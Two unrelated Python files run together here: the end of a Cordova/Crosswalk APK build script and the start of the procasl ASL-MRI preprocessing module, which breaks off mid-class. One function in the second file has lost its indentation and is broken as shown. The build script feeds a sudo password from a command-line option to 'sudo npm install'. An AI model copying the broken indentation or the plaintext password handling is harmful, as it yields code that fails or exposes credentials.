    while True:
        cmd_exit_code = cmd_proc.poll()
        elapsed_time = time.time() - pre_time
        if cmd_exit_code is None:
            # Still running: enforce the timeout.
            if elapsed_time >= time_out:
                killProcesses(ppid=cmd_proc.pid)
                LOG.error("Timeout to exe CMD")
                return False
        else:
            if not no_check_return and cmd_exit_code != 0:
                LOG.error("Fail to exe CMD")
                return False
            break
        time.sleep(2)
    return True
def replaceKey(file_path, content, key):
    """Replace *key* with *content* inside *file_path*.

    Returns True when the key was found and replaced, False (with an
    error logged) when the key is absent from the file.
    """
    with open(file_path, "r") as handle:
        text = handle.read()
    if text.find(key) == -1:
        LOG.error(
            "Fail to replace: %s with: %s in file: %s" %
            (content, key, file_path))
        return False
    with open(file_path, "w") as handle:
        handle.write(text.replace(key, content))
    return True
def packMobileSpec(app_name=None):
    """Build the mobilespec APK with the cordova 3.6 tooling.

    Copies the bundled cordova tool and mobilespec sources into BUILD_ROOT,
    creates the project, builds CordovaLib with ant, runs "cordova build
    android", and copies the produced APK back next to the original
    working directory.  Returns True on success, False otherwise.
    """
    pack_tool = os.path.join(BUILD_ROOT, "cordova")
    if not os.path.exists(pack_tool):
        if not doCopy(
                os.path.join(BUILD_PARAMETERS.pkgpacktools, "cordova"),
                pack_tool):
            return False
    orig_dir = os.getcwd()
    os.chdir(pack_tool)
    if BUILD_PARAMETERS.pkgmode == "shared":
        pack_cmd = "bin/create mobilespec org.apache.mobilespec mobilespec --xwalk-shared-library"
    else:
        pack_cmd = "bin/create mobilespec org.apache.mobilespec mobilespec"
    if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
        os.chdir(orig_dir)
        return False
    mobilespec_src = os.path.join(BUILD_ROOT, "mobilespec_src")
    if not os.path.exists(mobilespec_src):
        if not doCopy(
                os.path.join(BUILD_PARAMETERS.pkgpacktools, "mobilespec"),
                mobilespec_src):
            return False
    if not doCopy(
            os.path.join(pack_tool, "mobilespec", "CordovaLib"),
            os.path.join(mobilespec_src, "platforms", "android", "CordovaLib")):
        return False
    if not doCopy(
            os.path.join(pack_tool, "VERSION"),
            os.path.join(mobilespec_src, "platforms", "android")):
        return False
    os.chdir(os.path.join(mobilespec_src, "platforms", "android"))
    # Derive ANDROID_HOME from the `android` tool found on PATH.
    ANDROID_HOME = "echo $(dirname $(dirname $(which android)))"
    updateproject_cmd = "android update project --subprojects --path . --target \"android-21\""
    antdebug_cmd = "ant debug"
    build_cmd = "cordova build android"
    os.environ['ANDROID_HOME'] = commands.getoutput(ANDROID_HOME)
    if not doCMD(updateproject_cmd, DEFAULT_CMD_TIMEOUT):
        os.chdir(orig_dir)
        return False
    os.chdir(
        os.path.join(
            mobilespec_src,
            "platforms",
            "android",
            "CordovaLib"))
    if not doCMD(antdebug_cmd, DEFAULT_CMD_TIMEOUT):
        os.chdir(orig_dir)
        return False
    os.chdir(mobilespec_src)
    if not doCMD(build_cmd, DEFAULT_CMD_TIMEOUT):
        os.chdir(orig_dir)
        return False
    app_dir = os.path.join(mobilespec_src, "platforms", "android", "out")
    # Prefer the aligned APK; fall back to the unaligned build artifact.
    if not doCopy(os.path.join(app_dir, "%s-debug.apk" % app_name),
                  os.path.join(orig_dir, "%s.apk" % app_name)):
        if not doCopy(os.path.join(app_dir, "%s-debug-unaligned.apk" % app_name),
                      os.path.join(orig_dir, "%s.apk" % app_name)):
            os.chdir(orig_dir)
            return False
    os.chdir(orig_dir)
    return True
def packSampleApp(app_name=None):
    """Build a sample app APK (gallery/helloworld/remotedebugging) with the
    cordova 3.6-style tooling; cordova 4.0 additionally installs the
    crosswalk engine plugin via plugman.

    The resulting <app_name>.apk is copied back next to the original
    working directory.  Returns True on success, False otherwise.
    """
    pack_tool = os.path.join(BUILD_ROOT, "cordova")
    if not os.path.exists(pack_tool):
        if not doCopy(
                os.path.join(BUILD_PARAMETERS.pkgpacktools, "cordova"),
                pack_tool):
            return False
    orig_dir = os.getcwd()
    os.chdir(pack_tool)
    if BUILD_PARAMETERS.pkgmode == "shared":
        pack_cmd = "bin/create " + app_name + " com.example." + \
            app_name + " " + app_name + " --xwalk-shared-library"
    else:
        pack_cmd = "bin/create " + app_name + " com.example." + \
            app_name + " " + app_name + " --shared"
    if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
        os.chdir(orig_dir)
        return False
    # Gallery app: replace the generated www/ with the blueimp Gallery sources.
    if checkContains(app_name, "GALLERY"):
        getsource_cmd = "git clone https://github.com/blueimp/Gallery"
        if not doCMD(getsource_cmd, DEFAULT_CMD_TIMEOUT):
            os.chdir(orig_dir)
            return False
        if not doRemove(
                glob.glob(os.path.join(pack_tool, app_name, "assets", "www"))):
            os.chdir(orig_dir)
            return False
        if not doCopy(os.path.join(pack_tool, "Gallery"),
                      os.path.join(pack_tool, app_name, "assets", "www")):
            os.chdir(orig_dir)
            return False
    if checkContains(app_name, "HELLOWORLD"):
        if not replaceKey(os.path.join(pack_tool, app_name, "assets", "www", "index.html"),
                          "<a href='http://www.intel.com'>Intel</a>\n</body>",
                          "</body>"):
            os.chdir(orig_dir)
            return False
    os.chdir(os.path.join(pack_tool, app_name))
    if BUILD_PARAMETERS.cordovaversion == "4.0":
        # 4.0 gradle builds place the APK under build/outputs/apk, per arch.
        if BUILD_PARAMETERS.pkgarch == "x86":
            cordova_tmp_path = os.path.join(
                BUILD_ROOT,
                "cordova",
                app_name,
                "build",
                "outputs",
                "apk",
                "%s-x86-debug.apk" %
                app_name)
        else:
            cordova_tmp_path = os.path.join(
                BUILD_ROOT,
                "cordova",
                app_name,
                "build",
                "outputs",
                "apk",
                "%s-armv7-debug.apk" %
                app_name)
        plugin_tool = os.path.join(
            BUILD_ROOT,
            "cordova_plugins",
            "cordova-crosswalk-engine")
        if not os.path.exists(plugin_tool):
            if not doCopy(
                    os.path.join(
                        BUILD_PARAMETERS.pkgpacktools,
                        "cordova_plugins",
                        "cordova-crosswalk-engine"),
                    plugin_tool):
                return False
        plugin_install_cmd = "plugman install --platform android --project " \
            "./ --plugin %s" % plugin_tool
        if not doCMD(plugin_install_cmd, DEFAULT_CMD_TIMEOUT):
            os.chdir(orig_dir)
            return False
    else:
        # 3.6 ant builds place the APK under bin/.
        cordova_tmp_path = os.path.join(
            BUILD_ROOT,
            "cordova",
            app_name,
            "bin",
            "%s-debug.apk" %
            app_name)
    pack_cmd = "./cordova/build"
    if checkContains(app_name, "REMOTEDEBUGGING"):
        pack_cmd = "./cordova/build --debug"
    # Derive ANDROID_HOME from the `android` tool found on PATH.
    ANDROID_HOME = "echo $(dirname $(dirname $(which android)))"
    os.environ['ANDROID_HOME'] = commands.getoutput(ANDROID_HOME)
    # Fall back to a plain `ant debug` if the cordova build wrapper fails.
    if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
        pack_cmd = "ant debug"
        if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
            os.chdir(orig_dir)
            return False
    if not doCopy(cordova_tmp_path,
                  os.path.join(orig_dir, app_name + ".apk")):
        os.chdir(orig_dir)
        return False
    os.chdir(orig_dir)
    return True
def packMobileSpec_cli(app_name=None):
    """Build the mobilespec APK with the cordova 4.0 CLI workflow.

    Requires Cordova-CLI 5.0.0 on PATH; uses pexpect to feed the user's
    sudo password to `sudo npm install` when the mobilespec sources need
    regenerating.  The produced <app_name>.apk is copied back next to the
    original working directory.  Returns True on success.
    """
    project_root = os.path.join(BUILD_ROOT, app_name)
    output = commands.getoutput("cordova -v")
    if output != "5.0.0":
        LOG.error(
            "Cordova 4.0 build requires Cordova-CLI 5.0.0, install with command: '$ sudo npm install cordova@5.0.0 -g'")
        return False
    plugin_tool = os.path.join(BUILD_ROOT, "cordova-plugin-crosswalk-webview")
    if not doCopy(os.path.join(BUILD_PARAMETERS.pkgpacktools,
                               "cordova_plugins", "cordova-plugin-crosswalk-webview"), plugin_tool):
        return False
    cordova_mobilespec = os.path.join(BUILD_ROOT, "cordova-mobile-spec")
    if not doCopy(os.path.join(BUILD_PARAMETERS.pkgpacktools,
                               "mobilespec", "cordova-mobile-spec"), cordova_mobilespec):
        return False
    cordova_coho = os.path.join(BUILD_ROOT, "cordova-coho")
    if not doCopy(os.path.join(
            BUILD_PARAMETERS.pkgpacktools, "mobilespec", "cordova-coho"), cordova_coho):
        return False
    orig_dir = os.getcwd()
    os.chdir(cordova_coho)
    output = commands.getoutput("git pull").strip("\r\n")
    os.chdir(cordova_mobilespec)
    output = commands.getoutput("git pull").strip("\r\n")
    if output == "Already up-to-date.":
        # Sources unchanged: reuse the pre-generated mobilespec project.
        if not doCopy(os.path.join(
                BUILD_PARAMETERS.pkgpacktools, "mobilespec", "mobilespec"), project_root):
            return False
    else:
        # Sources changed: npm-install createmobilespec (needs sudo, driven
        # via pexpect) and regenerate the project from scratch.
        node_modules = os.path.join(
            cordova_mobilespec,
            "createmobilespec",
            "node_modules")
        os.chdir(os.path.join(cordova_mobilespec, "createmobilespec"))
        install_cmd = "sudo npm install"
        LOG.info("Doing CMD: [ %s ]" % install_cmd)
        run = pexpect.spawn(install_cmd)
        index = run.expect(
            ['password', 'node_modules', pexpect.EOF, pexpect.TIMEOUT])
        if index == 0:
            run.sendline(BUILD_PARAMETERS.userpassword)
            index = run.expect(
                ['node_modules', 'password', pexpect.EOF, pexpect.TIMEOUT])
            if index == 0:
                print 'The user password is Correctly'
            else:
                print 'The user password is wrong'
                run.close(force=True)
                return False
        elif index != 1:
            print 'The user password is wrong'
            run.close(force=True)
            return False
        os.chdir(BUILD_ROOT)
        createmobilespec_cmd = "cordova-mobile-spec/createmobilespec/createmobilespec.js --android --global"
        if not doCMD(createmobilespec_cmd, DEFAULT_CMD_TIMEOUT * 3):
            os.chdir(orig_dir)
            return False
        os.chdir(project_root)
        # Rename the generated main activity so it matches the app name.
        mv_cmd = "mv platforms/android/src/org/apache/mobilespec/MainActivity.java platforms/android/src/org/apache/mobilespec/mobilespec.java"
        if not doCMD(mv_cmd, DEFAULT_CMD_TIMEOUT):
            os.chdir(orig_dir)
            return False
        sed_cmd = "sed -i 's/MainActivity/mobilespec/g' `grep MainActivity -rl *`"
        if not doCMD(sed_cmd, DEFAULT_CMD_TIMEOUT):
            os.chdir(orig_dir)
            return False
    os.chdir(project_root)
    add_webview_cmd = "cordova plugin add ../cordova-plugin-crosswalk-webview/"
    if not doCMD(add_webview_cmd, DEFAULT_CMD_TIMEOUT):
        os.chdir(orig_dir)
        return False
    # Derive ANDROID_HOME from the `android` tool found on PATH.
    ANDROID_HOME = "echo $(dirname $(dirname $(which android)))"
    os.environ['ANDROID_HOME'] = commands.getoutput(ANDROID_HOME)
    pack_cmd = "cordova build android"
    if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
        os.chdir(orig_dir)
        return False
    outputs_dir = os.path.join(
        project_root,
        "platforms",
        "android",
        "build",
        "outputs",
        "apk")
    if BUILD_PARAMETERS.pkgarch == "x86":
        cordova_tmp_path = os.path.join(
            outputs_dir,
            "%s-x86-debug.apk" %
            app_name)
        cordova_tmp_path_spare = os.path.join(
            outputs_dir,
            "android-x86-debug.apk")
    else:
        cordova_tmp_path = os.path.join(
            outputs_dir,
            "%s-armv7-debug.apk" %
            app_name)
        cordova_tmp_path_spare = os.path.join(
            outputs_dir,
            "android-armv7-debug.apk")
    # The APK name varies with the cordova version; try both known names.
    if os.path.exists(cordova_tmp_path):
        if not doCopy(
                cordova_tmp_path, os.path.join(orig_dir, "%s.apk" % app_name)):
            os.chdir(orig_dir)
            return False
    elif os.path.exists(cordova_tmp_path_spare):
        if not doCopy(
                cordova_tmp_path_spare, os.path.join(orig_dir, "%s.apk" % app_name)):
            os.chdir(orig_dir)
            return False
    else:
        os.chdir(orig_dir)
        return False
    os.chdir(orig_dir)
    return True
def packSampleApp_cli(app_name=None):
    """Build a sample app APK with the cordova 4.0 CLI workflow.

    Requires Cordova-CLI 5.0.0 on PATH.  Creates the project, patches
    config.xml, installs every bundled plugin, builds for android, and
    copies the produced <app_name>.apk back next to the original working
    directory.  Returns True on success.
    """
    project_root = os.path.join(BUILD_ROOT, app_name)
    output = commands.getoutput("cordova -v")
    if output != "5.0.0":
        LOG.error(
            "Cordova 4.0 build requires Cordova-CLI 5.0.0, install with command: '$ sudo npm install cordova@5.0.0 -g'")
        return False
    plugin_tool = os.path.join(BUILD_ROOT, "cordova_plugins")
    if not os.path.exists(plugin_tool):
        if not doCopy(
                os.path.join(BUILD_PARAMETERS.pkgpacktools, "cordova_plugins"),
                plugin_tool):
            return False
    orig_dir = os.getcwd()
    os.chdir(BUILD_ROOT)
    pack_cmd = "cordova create %s com.example.%s %s" % (
        app_name, app_name, app_name)
    if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
        os.chdir(orig_dir)
        return False
    # Set activity name as app_name
    replaceUserString(
        project_root,
        'config.xml',
        '<widget',
        '<widget android-activityName="%s"' %
        app_name)
    # Workaround for XWALK-3679
    replaceUserString(
        project_root,
        'config.xml',
        '</widget>',
        '    <allow-navigation href="*" />\n</widget>')
    # Gallery app: replace the generated www/ with the blueimp Gallery sources.
    if checkContains(app_name, "GALLERY"):
        getsource_cmd = "git clone https://github.com/blueimp/Gallery"
        if not doCMD(getsource_cmd, DEFAULT_CMD_TIMEOUT):
            os.chdir(orig_dir)
            return False
        if not doRemove(glob.glob(os.path.join(project_root, "www"))):
            os.chdir(orig_dir)
            return False
        if not doCopy(os.path.join(BUILD_ROOT, "Gallery"),
                      os.path.join(project_root, "www")):
            os.chdir(orig_dir)
            return False
    if checkContains(app_name, "HELLOWORLD"):
        if not replaceKey(os.path.join(project_root, "www", "index.html"),
                          "<a href='http://www.intel.com'>Intel</a>\n</body>",
                          "</body>"):
            os.chdir(orig_dir)
            return False
    os.chdir(project_root)
    pack_cmd = "cordova platform add android"
    if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
        os.chdir(orig_dir)
        return False
    # Install every plugin shipped in the bundled cordova_plugins folder.
    plugin_dirs = os.listdir(plugin_tool)
    for i_dir in plugin_dirs:
        i_plugin_dir = os.path.join(plugin_tool, i_dir)
        plugin_install_cmd = "cordova plugin add %s" % i_plugin_dir
        if not doCMD(plugin_install_cmd, DEFAULT_CMD_TIMEOUT):
            os.chdir(orig_dir)
            return False
    # Derive ANDROID_HOME from the `android` tool found on PATH.
    ANDROID_HOME = "echo $(dirname $(dirname $(which android)))"
    os.environ['ANDROID_HOME'] = commands.getoutput(ANDROID_HOME)
    pack_cmd = "cordova build android"
    if checkContains(app_name, "REMOTEDEBUGGING"):
        pack_cmd = "cordova build android --debug"
    if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
        os.chdir(orig_dir)
        return False
    outputs_dir = os.path.join(
        project_root,
        "platforms",
        "android",
        "build",
        "outputs",
        "apk")
    if BUILD_PARAMETERS.pkgarch == "x86":
        cordova_tmp_path = os.path.join(
            outputs_dir,
            "%s-x86-debug.apk" %
            app_name)
        cordova_tmp_path_spare = os.path.join(
            outputs_dir,
            "android-x86-debug.apk")
    else:
        cordova_tmp_path = os.path.join(
            outputs_dir,
            "%s-armv7-debug.apk" %
            app_name)
        cordova_tmp_path_spare = os.path.join(
            outputs_dir,
            "android-armv7-debug.apk")
    # The APK name varies with the cordova version; try both known names.
    if not os.path.exists(cordova_tmp_path):
        if not doCopy(
                cordova_tmp_path_spare, os.path.join(orig_dir, "%s.apk" % app_name)):
            os.chdir(orig_dir)
            return False
    else:
        if not doCopy(
                cordova_tmp_path, os.path.join(orig_dir, "%s.apk" % app_name)):
            os.chdir(orig_dir)
            return False
    os.chdir(orig_dir)
    return True
def packAPP(app_name=None):
    """Dispatch to the right packer for *app_name* and the cordova version.

    mobilespec packages go through packMobileSpec(_cli); all other sample
    apps go through packSampleApp(_cli).  The *_cli variants are used for
    cordova 4.0; the 4.0 mobilespec build also needs the user's sudo
    password.  Returns True on success, False otherwise.
    """
    LOG.info("Packing %s" % (app_name))
    if checkContains(app_name, "MOBILESPEC"):
        if BUILD_PARAMETERS.cordovaversion == "4.0":
            if not BUILD_PARAMETERS.userpassword:
                LOG.error("User password is required")
                return False
            if not packMobileSpec_cli(app_name):
                return False
        else:
            if not packMobileSpec(app_name):
                return False
    else:
        if BUILD_PARAMETERS.cordovaversion == '4.0':
            if not packSampleApp_cli(app_name):
                return False
        else:
            if not packSampleApp(app_name):
                return False
    LOG.info("Success to pack APP: %s" % app_name)
    return True
def main():
    """Entry point: set up logging, parse and validate command-line options,
    then prepare the build root and build the requested package.

    Exits the process directly on option errors; build failures go through
    exitHandler() so the build root is cleaned up.
    """
    global LOG
    LOG = logging.getLogger("pack-tool")
    LOG.setLevel(LOG_LEVEL)
    stream_handler = logging.StreamHandler()
    stream_handler.setLevel(LOG_LEVEL)
    stream_formatter = ColorFormatter("[%(asctime)s] %(message)s")
    stream_handler.setFormatter(stream_formatter)
    LOG.addHandler(stream_handler)
    try:
        usage = "Usage: ./pack.py -t apk -m shared -a x86"
        opts_parser = OptionParser(usage=usage)
        opts_parser.add_option(
            "-n",
            "--name",
            dest="pkgname",
            help="specify the pkg name, e.g. gallery, helloworld, remotedebugging, mobilespec ...")
        opts_parser.add_option(
            "--cordova-version",
            dest="cordovaversion",
            help="specify the cordova, e.g. 3.6, 4.0 ...")
        opts_parser.add_option(
            "--tools",
            dest="pkgpacktools",
            help="specify the parent folder of pack tools")
        opts_parser.add_option(
            "--notclean",
            dest="bnotclean",
            action="store_true",
            help="disable the build root clean after the packing")
        opts_parser.add_option(
            "-v",
            "--version",
            dest="bversion",
            action="store_true",
            help="show this tool's version")
        opts_parser.add_option(
            "-m",
            "--mode",
            dest="pkgmode",
            help="specify the apk mode, not for cordova version 4.0, e.g. shared, embedded")
        opts_parser.add_option(
            "-a",
            "--arch",
            dest="pkgarch",
            help="specify the apk arch, not for cordova version 3.6, e.g. x86, arm")
        opts_parser.add_option(
            "-p",
            "--password",
            dest="userpassword",
            help="specify the user password of PC")
        # With no arguments at all, show the help text instead of failing.
        if len(sys.argv) == 1:
            sys.argv.append("-h")
        global BUILD_PARAMETERS
        (BUILD_PARAMETERS, args) = opts_parser.parse_args()
    except Exception as e:
        LOG.error("Got wrong options: %s, exit ..." % e)
        sys.exit(1)
    if BUILD_PARAMETERS.bversion:
        print "Version: %s" % TOOL_VERSION
        sys.exit(0)
    if not BUILD_PARAMETERS.pkgname:
        LOG.error("No pkg name provided, exit ...")
        sys.exit(1)
    elif not BUILD_PARAMETERS.pkgname in PKG_NAMES:
        LOG.error("Wrong pkg name, only support: %s, exit ..." %
                  PKG_NAMES)
        sys.exit(1)
    if not BUILD_PARAMETERS.cordovaversion:
        LOG.error("No cordova version provided, exit ...")
        sys.exit(1)
    elif not BUILD_PARAMETERS.cordovaversion in CORDOVA_VERSIONS:
        LOG.error("Wrong cordova version, only support: %s, exit ..." %
                  CORDOVA_VERSIONS)
        sys.exit(1)
    if BUILD_PARAMETERS.pkgarch and not BUILD_PARAMETERS.pkgarch in PKG_ARCHS:
        LOG.error("Wrong pkg-arch, only support: %s, exit ..." %
                  PKG_ARCHS)
        sys.exit(1)
    if BUILD_PARAMETERS.pkgmode and not BUILD_PARAMETERS.pkgmode in PKG_MODES:
        LOG.error("Wrong pkg-mode, only support: %s, exit ..." %
                  PKG_MODES)
        sys.exit(1)
    # -a applies only to cordova 4.0 builds; -m applies only to 3.6 builds.
    if BUILD_PARAMETERS.cordovaversion == '3.6' and BUILD_PARAMETERS.pkgarch:
        LOG.error("Command -a is not for cordova version 3.6")
        sys.exit(1)
    if BUILD_PARAMETERS.cordovaversion == '4.0' and BUILD_PARAMETERS.pkgmode:
        LOG.error("Command -m is only for cordova version 3.6")
        sys.exit(1)
    if not BUILD_PARAMETERS.pkgpacktools:
        BUILD_PARAMETERS.pkgpacktools = os.path.join(
            os.getcwd(),
            "..",
            "..",
            "tools")
    BUILD_PARAMETERS.pkgpacktools = os.path.expanduser(
        BUILD_PARAMETERS.pkgpacktools)
    config_json = None
    global PKG_NAME, CORDOVA_VERSION
    PKG_NAME = BUILD_PARAMETERS.pkgname
    CORDOVA_VERSION = BUILD_PARAMETERS.cordovaversion
    LOG.info("================= %s (cordova-%s) ================" %
             (PKG_NAME, CORDOVA_VERSION))
    if not prepareBuildRoot():
        exitHandler(1)
    LOG.info("+Building package APP ...")
    if not packAPP(PKG_NAME):
        exitHandler(1)
if __name__ == "__main__":
    # main() exits early on failure; reaching exitHandler(0) means success.
    main()
    exitHandler(0)
|
|
# TODO: keep only classes, move functions to _utils, rename to preprocessor
import os
import numpy as np
from scipy.io import savemat
import nibabel
import nipype.interfaces.spm as spm
from nipype.interfaces import fsl
from nipype.interfaces.base import BaseInterface, \
BaseInterfaceInputSpec, traits, File, TraitedSpec, Directory
from nipype.utils.filemanip import split_filename
from nipype.interfaces.base import InputMultiPath, OutputMultiPath
from procasl.spm_internals import params_to_affine, spm_affine
from procasl._utils import check_images
fsl.FSLCommand.set_default_output_type('NIFTI')
def _add_prefix(prefix, in_file):
"""Adds a prefix to a filename
Parameters
----------
prefix : str
Prefix to append to the filename
in_file : str
Input file name.
Returns
-------
out_file : str
Output file name
"""
out_file = os.path.join(os.path.dirname(in_file),
prefix + os.path.basename(in_file))
return out_file
def get_scans_number(in_file):
    """Return the number of scans for a 4D image.

    Parameters
    ----------
    in_file : str
        Input file name.

    Returns
    -------
    int
        Number of scans (size of the last axis).

    Raises
    ------
    ValueError
        If the image is not 4-dimensional.
    """
    data = nibabel.load(in_file).get_data()
    if data.ndim != 4:
        raise ValueError("Expect a 4D image, got a {0}D".format(data.ndim))
    return data.shape[-1]
def select_scans(in_file, selected_scans, convert_3d=False, out_file=None):
    """Save selected scan volumes from a 4D image.

    Parameters
    ----------
    in_file : str
        Path to the 4D image.
    selected_scans : list of int
        Scans to keep.
    convert_3d : bool, optional
        If True, the image is saved as a 3D nifti image.
    out_file : str or None, optional
        Path to the extracted image. Defaults to the input path with a
        'subscans_' prefix.

    Returns
    -------
    out_file : str
        Path to the extracted image.
    """
    source_image = nibabel.load(in_file)
    subdata = source_image.get_data()[..., selected_scans]
    if convert_3d:
        # Drop the (now singleton) time axis to get a true 3D volume.
        subdata = np.squeeze(subdata, axis=(3,))
    out_image = nibabel.Nifti1Image(subdata, source_image.get_affine(),
                                    source_image.get_header())
    if out_file is None:
        out_file = _add_prefix('subscans_', in_file)
    nibabel.save(out_image, out_file)
    return out_file
def save_first_scan(in_file, out_file=None):
    """Save the first volume from a 4D image as a 3D image.

    Parameters
    ----------
    in_file : str
        Path to the 4D image.
    out_file : str or None, optional
        Path to the output image. Defaults to the input path with a
        'first_volume_' prefix.

    Returns
    -------
    out_file : str
        Path to the output image.
    """
    if out_file is None:
        out_file = os.path.join(os.path.dirname(in_file),
                                'first_volume_' + os.path.basename(in_file))
    # Delegate to select_scans, keeping only scan 0 and squeezing to 3D.
    return select_scans(in_file, [0], convert_3d=True, out_file=out_file)
def compute_brain_mask(in_file, frac=0.5):
    """Compute a binary brain mask using FSL BET.

    Parameters
    ----------
    in_file : str
        Path to the 3D image.
    frac : float, optional
        Fractional intensity threshold; smaller values give larger brain
        outline estimates.

    Returns
    -------
    str
        Path to the brain mask image.
    """
    bet = fsl.BET()
    bet.inputs.in_file = in_file
    bet.inputs.frac = frac
    bet.inputs.mask = True  # also produce the binary mask output
    result = bet.run()
    return result.outputs.mask_file
def apply_mask(in_file, mask_file, mask_value=np.nan, out_file=None):
    """Mask an image with a binary mask.

    Parameters
    ----------
    in_file : str
        Path to the 3D image.
    mask_file : str
        Path to the binary mask image.
    mask_value : float, optional
        Value to allocate to masked (zero) voxels.
    out_file : str or None, optional
        Path to the masked image. Defaults to the input path with a
        'masked_' prefix.

    Returns
    -------
    out_file : str
        Path to the masked image.
    """
    image = nibabel.load(in_file)
    mask_image = nibabel.load(mask_file)
    # Fail early when shapes or affines disagree.
    check_images(in_file, mask_file)
    masked = image.get_data()
    masked[mask_image.get_data() == 0] = mask_value
    out_image = nibabel.Nifti1Image(masked, image.get_affine(),
                                    image.get_header())
    if out_file is None:
        out_file = _add_prefix('masked_', in_file)
    nibabel.save(out_image, out_file)
    return out_file
class RescaleInputSpec(BaseInterfaceInputSpec):
    # Input specification for the Rescale interface: timing parameters of
    # the PASL acquisition needed for the slice-wise T1 correction.
    in_file = File(
        exists=True,
        mandatory=True,
        copyfile=True,
        desc='image filename to rescale')
    # Per-slice acquisition time; drives the slice-dependent decay term.
    ss_tr = traits.Float(
        mandatory=True,
        desc='Single slice repetition time, in ms')
    t_i_1 = traits.Float(
        mandatory=True,
        desc='Bolus length, in ms')
    t_i_2 = traits.Float(
        mandatory=True,
        desc='Inversion time (time from the application of the labeling'
             'pulse to image acquisition), in ms')
    # Default is a typical 3T arterial blood T1.
    t1_blood = traits.Float(
        1650.,
        usedefault=True,
        desc='T1 of the blood in ms')
    label_efficiency = traits.Float(
        .98,
        usedefault=True,
        desc='labeling efficiency')
class RescaleOutputSpec(TraitedSpec):
    # Output specification for the Rescale interface.
    rescaled_file = File(exists=True,
                         desc='The rescaled image file')
class Rescale(BaseInterface):
    """Correct for T1 relaxation between different slices.
    PASL images are acquired in EPI single shot with slices from
    bottom to up of the brain.
    For PASL,
    CBF (ml/100g/min) = DeltaM / (2 * M0b * tao * exp(-TI / T1b) * qTI)
    and
    M0b = Rwm * M0WM * exp((1 / T2wm - 1 / T2b) * TE)
    or M0b=Rcsf * M0csf * exp((1 / T2csf-1 / T2b) * TE)
    or M0b = MPD / (1 - exp(-TR / T1_tissue)),
    TI is the inversion time for different slice;
    T1b is the constant relaxation time of arterial blood.
    tao is actually TI1 in QUIPPS II
    qTI is close to unit, and is set to 0.85 in Warmuth 05. In addition, we
    introduce the label efficiency in the calculation.
    Rwm - proton density ratio between blood and WM1.06 in Wong 97. 1.19 in
    Cavosuglu 09; T2wm and T2b are 55 msec and 100 for 1.5T, 40 and 80 for 3T,
    30 and 60 for 4T;
    Rcsf - proton density ratio between blood and csf, 0.87 in Cavosuglu,
    T2csf is 74.9 ms for 3T.
    M0WM means the mean value in an homogenous white matter region, and it
    could be selected by drawing an ROI in the M0 image.
    T2wm and T2b at 3T were set to 44.7 and 43.6,
    T2csf if used was set to 74.9 according to Cavusoglu 09 MRI
    Notes
    -----
    This is a reimplementation of the rescaling method of
    correction_scalefactors_philips_2010.m from the GIN toolbox,
    courtesy of Jan Warnking.
    References
    ----------
    Buxton et al, 1998 MRM 40:383-96.
    Warmuth C., Gunther M. and Zimmer G. Radiology, 2003; 228:523-532.
    Examples
    --------
    from procasl import preprocessing
    rescale = preprocessing.Rescale()
    rescale.inputs.in_file = 'raw_asl.nii'
    rescale.inputs.ss_tr = 35.
    rescale.inputs.t_i_1 = 800.
    rescale.inputs.t_i_2 = 1800.
    out_rescale = rescale.run()
    print(out_rescale.outputs.rescaled_file)
    """
    input_spec = RescaleInputSpec
    output_spec = RescaleOutputSpec
    def _run_interface(self, runtime):
        img = nibabel.load(self.inputs.in_file)
        data = img.get_data()
        # Slices are along axis 2; each slice k is acquired t_i_2 + k * ss_tr
        # after labeling, hence the slice-dependent exponential below.
        n_slices = data.shape[2]
        milli_second = 1000.  # 1s in ms
        # Per-slice scale factor: T1 decay of the label divided by
        # 2 * label_efficiency * bolus length (t_i_1 converted to seconds).
        scaling = np.exp((self.inputs.t_i_2 + self.inputs.ss_tr *
                          np.arange(0, n_slices)) / self.inputs.t1_blood) /\
            (2. * self.inputs.label_efficiency *
             self.inputs.t_i_1 / milli_second)
        # Broadcast the per-slice factors over x, y and time.
        scaling = scaling[np.newaxis, np.newaxis, :, np.newaxis]
        scaling = np.tile(scaling, (data.shape[0], data.shape[1], 1,
                                    data.shape[-1]))
        data = data * scaling
        img = nibabel.Nifti1Image(data, img.get_affine(), img.get_header())
        out_file = _add_prefix('sc_', self.inputs.in_file)
        nibabel.save(img, out_file)
        return runtime
    def _list_outputs(self):
        # The rescaled file is written next to the working directory with
        # the 'sc_' prefix used in _run_interface.
        outputs = self._outputs().get()
        fname = self.inputs.in_file
        _, base, _ = split_filename(fname)
        outputs["rescaled_file"] = os.path.abspath(
            'sc_' + base + '.nii')
        return outputs
class AverageInputSpec(BaseInterfaceInputSpec):
    # Input specification for the Average interface.
    # NOTE(review): the desc says "list of images" but the trait is a single
    # File -- presumably a single 4D image is expected; confirm with callers.
    in_file = File(
        exists=True,
        mandatory=True,
        copyfile=True,
        desc='list of images filenames to average')
class AverageOutputSpec(TraitedSpec):
    # Output specification for the Average interface.
    mean_image = File(exists=True,
                      desc='The average image file')
class Average(BaseInterface):
    """Compute average functional across time, keeping the affine of
    first scan.
    Notes
    -----
    This is a reimplementation of the averaging method of
    average_2010.m from the GIN toolbox.
    """
    input_spec = AverageInputSpec
    output_spec = AverageOutputSpec
    def _run_interface(self, runtime):
        # Compute and save the mean
        img = nibabel.load(self.inputs.in_file)
        # Average over the time (last) axis; the input's affine and header
        # are propagated to the mean image.
        data = img.get_data().mean(axis=-1)
        img = nibabel.Nifti1Image(data, img.get_affine(), img.get_header())
        fname = self.inputs.in_file
        _, base, _ = split_filename(fname)
        out_file = os.path.abspath('mean_' + base + '.nii')
        nibabel.save(img, out_file)
        return runtime
    def _list_outputs(self):
        # Mirror the 'mean_' naming used in _run_interface.
        outputs = self._outputs().get()
        fname = self.inputs.in_file
        _, base, _ = split_filename(fname)
        outputs["mean_image"] = os.path.abspath(
            'mean_' + base + '.nii')
        return outputs
class ControlTagRealignInputSpec(BaseInterfaceInputSpec):
    # Input specification for the ControlTagRealign interface.
    in_file = File(
        exists=True,
        mandatory=True,
        copyfile=True,
        desc='The filename of the input ASL 4D image.')
    paths = InputMultiPath(Directory(exists=True),
                           desc='Paths to add to matlabpath')
    register_to_mean = traits.Bool(
